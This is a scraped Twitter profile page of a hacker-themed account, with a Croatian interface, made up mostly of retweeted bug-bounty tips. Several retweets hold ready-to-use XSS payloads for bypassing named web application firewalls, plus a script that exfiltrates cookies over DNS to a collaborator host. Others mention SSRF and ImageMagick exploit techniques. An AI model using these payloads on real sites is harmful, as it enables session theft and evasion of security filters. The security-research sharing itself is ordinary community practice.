Z3D

@Z3Dxploit

L3B4N3A5E 🇱🇧 while True: print('We are justice, We show no mercy, Let them catch us -if they can-')

Vrijeme pridruživanja: listopad 2019.

Tweetovi

Blokirali ste korisnika/cu @Z3Dxploit

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @Z3Dxploit

  1. proslijedio/la je Tweet
    11. sij

    I just saw an American with the tattoo “الكوابيس آخر أبدا" which confused my entire existence. I typed it on Google Translate and it translated to “nightmares never last”...

    Poništi
  2. proslijedio/la je Tweet
    10. sij

    Trying to brute force the password when it's attached to a sticky note on the monitor...

    Poništi
  3. proslijedio/la je Tweet
    4. sij

    XSS waf bypass challenge... Please share your favorite xss payload for waf bypass... My favorite : ">'><details/open/ontoggle=confirm('XSS')>

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    3. sij

    FINALLY releasing hakrawler! A web crawler for hackers! Check out the blog post for details.

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    2. sij

    It gives me great pleasure to announce the release of the OWASP Foundation API Security Top 10 - 2019 edition. Thank you Inon Shkedy, Paulo Silva, and David Sopas for many MANY hours of work. Download the full publication from here:

    Poništi
  6. proslijedio/la je Tweet
    1. sij

    Why not step into the next decade with WAF bypasses? Here are some gifts.😎 - Imperva <a69/onclick=write&lpar;&rpar;>pew - DotDefender <a69/onclick=[0].map(alert)>pew - Cloudbric <a69/onclick=[1].findIndex(alert)>pew Happy 0x32303230.😉

    Poništi
  7. proslijedio/la je Tweet
    26. pro 2019.

    Cookie theft over DNS while XSS, payload by <script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script> Decode: atob("Your_Receveived_DNS".replace(/(.)./g, (_,x)=>x.toUpperCase()))

    Poništi
  8. proslijedio/la je Tweet
    29. pro 2019.

    I’m a noob. And I’ll always be a noob.. Because I thrive in the process of learning new things and to share my new knowledge with my friends. Always leveling myself and others up no matter if it’s Hacking tech, life or our minds.

    Poništi
  9. proslijedio/la je Tweet
    29. pro 2019.

    I never thought of adding the X-HTTP-Method-Override: PUT header to achieve RCE. I'm surprised this isn't built into burp's scanner.

    Poništi
  10. proslijedio/la je Tweet
    25. pro 2019.

    WAF XSS Bypasses by . Wordfence 7.4.2 <a href=&#01javascript:alert(1)> Sucuri CloudProxy (POST only) <a href=javascript&colon;confirm(1)> ModSecurity CRS 3.2.0 PL1 <a href="jav%0Dascript&colon;alert(1)">

    Poništi
  11. proslijedio/la je Tweet
    26. pro 2019.

    SSRF Break Points [1/2] - Anything that accepts a URL - File upload option? Change type="file" to type="url" and submit a URL. - Image upload? Submit a svg containing "image" element with the payload in xlink:href attribute. Try ImageMagick exploits.

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    22. pro 2019.
    Poništi
  13. proslijedio/la je Tweet
    20. pro 2019.
    Poništi
  14. proslijedio/la je Tweet
    19. pro 2019.

    This is seriously awesome stuff from These streams are huge for the bug community. He is the most awesome for providing these, and being so dang good at it too. He streams on a lot and does live recon with awesome guests on Sunday’s 🙃

    Poništi
  15. proslijedio/la je Tweet
    13. pro 2019.

    Hi, If you want to know how SSRF Vulnerability was exist in Vimeo, you should read: Reported through ;)

    Poništi
  16. proslijedio/la je Tweet
    17. ožu 2019.

    Hackers, I've built a small game that helps improve your XSS skills! It dynamically generates (increasingly more difficult) levels for you to exploit XSS vulnerabilities. No level is the same. Let me know what you think. Happy hacking!

    Poništi
  17. 11. pro 2019.
    Poništi
  18. proslijedio/la je Tweet
    Poništi
  19. proslijedio/la je Tweet
    27. stu 2019.

    Battle of the oranges

    Poništi
  20. proslijedio/la je Tweet
    10. stu 2019.
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·